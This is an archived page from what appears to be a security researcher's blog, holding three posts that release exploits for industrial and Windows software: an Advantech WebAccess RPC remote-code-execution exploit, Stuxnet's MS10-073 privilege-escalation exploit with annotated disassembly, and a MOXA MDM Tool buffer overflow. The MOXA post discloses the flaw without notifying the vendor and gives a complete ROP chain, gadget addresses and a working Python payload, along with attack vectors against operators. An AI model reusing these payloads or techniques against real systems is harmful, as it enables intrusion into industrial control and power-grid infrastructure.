Reversemode
Home
Wednesday, 22 May 2013
  
 
CONTENT
Home
Papers
Advisories
News Archive
Downloads
Contact
About









BYTES & WORDS
SCADA Trojans: Attacking the Grid + 0dayZ!
Written by Rubén   
Tuesday, 22 March 2011

Hi!

You can download the slides of the research I was presenting at RootedCon'11 in Madrid "SCADA Trojans: Attacking the grid". A journey into attacking the power grid.

I presented:

- 0days in Advantech/BroadWin WebAccess SCADA product
- Weak Design/Vulnerabilities in CSE-Semaphore TBOX RTUs
- General attack against EMS Software via State Estimators.


I contacted ICS-CERT to coordinate with Advantech but the vendor denied having a security flaw. So guys, the exploit I'm releasing does not exist. All is product of your mind.

Well, indeed WebAccess is full of bugs.

It is an RPC exploit against WebAccess Network Service, port 4592. It leaks the security code that protects the scada node in addition to demonstrate RCE on XP. Slighly modifications can be done to support other systems.

I use "RPC heap spray", I mean any opcode with the following params "[in] long arg_x, [in][ref][size_is(arg_x)] char * arg_x " can be used to create a fake object to control the execution. It could be done in other ways, but this one is funny.

Check the slides, there is more info about the vulns there.

Download Exploit source code

Download Slides [PDF] "SCADA Trojans: Attacking the Grid"



Bye!

Last Updated ( Wednesday, 23 March 2011 )
Stuxnet MS10-073/CVE-2010-2743 Exploit
Written by Rubén   
Thursday, 13 January 2011

Hi everyone,

To inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges in XP/2K boxes. It's stored in the resource 250, xored, can you guess the key? ;)

After performing several paranoid checks to avoid unsuccessful exploitation ( elaborated by VUPEN), the party starts...

The vulnerability has been already explained so just a couple of notes Resource250.dll 


.text:10001082                 test    si, si
.text:10001085                 jnz     short loc_100010A9
.text:10001087                 push    [ebp+var_4]
.text:1000108A                 lea     eax, [ebp+var_44]
.text:1000108D                 push    eax
.text:1000108E                 call    GoGoGo

...
.text:10002A48                 lea     eax, [ebp+var_218]
.text:10002A4E                 push    eax
.text:10002A4F                 lea     eax, [ebp+var_8]
.text:10002A52                 push    eax
.text:10002A53                 push    edi
.text:10002A54                 call    CreateFakeKbdLayoutFile
Stuxnet creates a temporary file and writes into it a minimalistic fake Keyboard Layout dll built up to be swallowed by win32k!ReadLayoutFile without problems. 
.text:10001FC6 loc_10001FC6:                           ; CODE XREF: CreateFakeKbdLayoutFile+CFj
.text:10001FC6                 push    ebx
.text:10001FC7                 lea     eax, [ebp+var_4]
.text:10001FCA                 push    eax
.text:10001FCB                 push    246h
.text:10001FD0                 push    offset unk_1000B058; fake Keyboard Layout Dll
.text:10001FD5                 push    esi
.text:10001FD6                 call    WriteFile
Then it is ready to trigger the vuln and execute the shellcode 
.text:10002A63                 push    [ebp+var_8]
.text:10002A66                 push    edi
.text:10002A67                 push    esi
.text:10002A68                 push    [ebp+arg_0]
.text:10002A6B                 push    [ebp+var_4]
.text:10002A6E                 call    TriggerVuln
...
.text:100027F3                 push    101h       
.text:100027F8                 push    [ebp+var_8]
.text:100027FB                 push    eax
.text:100027FC                 push    [ebp+var_4]
.text:100027FF                 push    1AE0160h
.text:10002804                 push    [ebp+arg_10]
.text:10002807                 call    LoadFakeKBDviaNtUserLoadKeyboardLayoutEx
Finally 
.text:10002839                 push    1Ch
.text:1000283B                 lea     eax, [ebp+var_50]
.text:1000283E                 push    eax
.text:1000283F                 push    ebx
.text:10002840                 mov     [edi+38h], esi
.text:10002843                 call    SendInput
At this point the shellcode is being executed. Everytime this code is executed God breaks something in Natanz.

[+] Download ms10-073-stuxnet.zip
Last Updated ( Thursday, 13 January 2011 )
[0day] MOXA MDM Tool 2.1 Buffer overflow.
Written by Rubén   
Wednesday, 20 October 2010

ICS-CERT has released an alert http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf

 Hi there,

The 0day I'm releasing today took exactly 2 minutes to find it out. Any decent code review or blackbox pentest would had uncovered it so I assume it didn't happen before releasing the product. MOXA is a company of industrial/SCADA products. Two days ago I tweeted the following http://twitter.com/reversemode/status/27770073464 without results, so here we go.


Moxa Device Manager (MDM for short) is an easy-to-use remote management tool for managing Moxa's ready-to-run embedded computers on the Internet. Moxa's embedded computers make excellent front-end computers at remote sites for onsite data collection and industrial control applications. Simply put, MDM makes it easy for system administrators to manage remote computers.
http://www.moxa.com/product/moxa_device_manager.htm

The flaw is a typical binary protocol flaw, summing it up: Module: MDMUtil.dll

MDMReceiveMsg->sub_100011A0 

readn(s,stack,4) //HEADER payload_size (2 bytes)  + function_code (2 bytes)
readn(s,stack+4,payload_size)
...
case 'function_code(s)'
strcpy(stack+n,stack+x) // where  n >> x
The module is compiled with /GS support so we have to overwrite the SEH handler and then generate an exception. Once the exception occurs, our exploit will take the control.

However, the exploit is not 100% reliable, only works if there are no pages mapped at the address where the thread's stack ends. Otherwise, recv fails since the Windows' sockets implementation in kernel-side checks the user-mode buffer before copying bytes received from the network.

Therefore, we should overwrite a fixed amount of stack, then wait till the inlined strcpy overwrites the SEH handler before triggering the exception when it tries to copy to an invalid address. Moreover, null bytes should be avoided or put as close as possible to the end of our buffer. The exploit is rather more interesting than the flaw itself.

The following ROP exploit uses the following gadgets: This address will be our fake SEH handler

Module: UTU.dll (Moxa MDM)

.text:1016587E                 add     esp, 838h
.text:10165884                 retn
It will be executed up to 4 times. We need this one to advance, within our buffer, to where our fake stack frames lie.Thus, we can use null bytes :)

Then we push calc.exe to the stack and get a pointer in esi via this gadget

Module: UTU.dll (Moxa MDM)

.text:1013D50A                 inc     esi
.text:1013D50B                 push    esp ; 'calc.exe'
.text:1013D50C                 pop     esi ;  esi->'calc.exe'
.text:1013D50D                 pop     ebp
.text:1013D50E                 add     esp, 1Ch // upcoming calls may corrupt calc.exe  
.text:1013D511                 retn


.text:100C31C2                 add     esp, 80h
.text:100C31C8                 retn    0Ch
Payload gadget

Module: UTU.dll (Moxa MDM)

.text:1014CD52                 push    esi             ; 'calc.exe'
.text:1014CD53                 call    ds:WinExec


Suicide gadget

Module: MDMTool.exe (Moxa MDM)



.text:00412EE9                 call    ds:GetCurrentProcess
.text:00412EEF                 push    eax             ; hProcess
.text:00412EF0                 call    ds:TerminateProcess
.text:00412EF6                 leave
.text:00412EF7                 retn


Tested on XP since it seems the only Windows version supported by the vendor.

The attack vectors are the following:

* Attacker entices the operator into connecting to a controlled gateway.
* Attacker hacks into the gateway's PC and plants the exploit.
* Attacker uploads a video to youtube. The video shows a kitty that will be executed unless the operator connects to the attacker's gateway.

Note that the Moxa Gateway software is also vulnerable to, at least, DoS attacks...probably rce as well.

Port:54321/TCP

Payload:

self.request.send("\x28\x10\x00\x29"
                  +"\x69\x69\x69\x69"*0xCE # pum
                  +"\x7e\x58\x16\x10" #SEH
                  +"\x7e\x58\x16\x10"*0x20E 
                  +"\x7e\x58\x16\x10" 
                  +"\x7e\x58\x16\x10"*0x20E
                  +"\x7e\x58\x16\x10" 
                  +"\x7e\x58\x16\x10"*0x20E 
                  +"\x7e\x58\x16\x10" 
                  +"\x7e\x58\x16\x10"*0x20e 
                  +"\x0a\xd5\x13\x10"        #gadget #1
                  +"calc.exe"           
                  +"\x00"*20
                  +"\xc2\x31\x0c\x10"*0x80   #gadget #2
                  +"\x52\xCD\x14\x10"*0x10   #gadget #3 WinExec
                  +"\x80\x80\x80\x80"*2
                  +"\xe9\x2e\x41\x00"*0x11C  #gadget #4 TerminateProcess
                  )


I've not notified the vendor because:

+ I am not working for them.
+ They don't have a security contact publicly available

Thanks to Mario Ceballos of Metasploit for informing me about vulnerability in Moxa's ActiveX SDK MediaDBPlayback.DLL. It seems that the PlayFileName property is vulnerable to a buffer overflow as well.

Actually, taking a look at the asm, it seems that the difficulty here is not to discover a vulnerability in their products.

Happy hunting!

Last Updated ( Thursday, 21 October 2010 )
More...
<< Start < Prev 1 2 3 4 5 6 7 8 9 10 Next > End >>

Results 9 - 12 of 64
 
"Nevertheless, it does move"
Galileo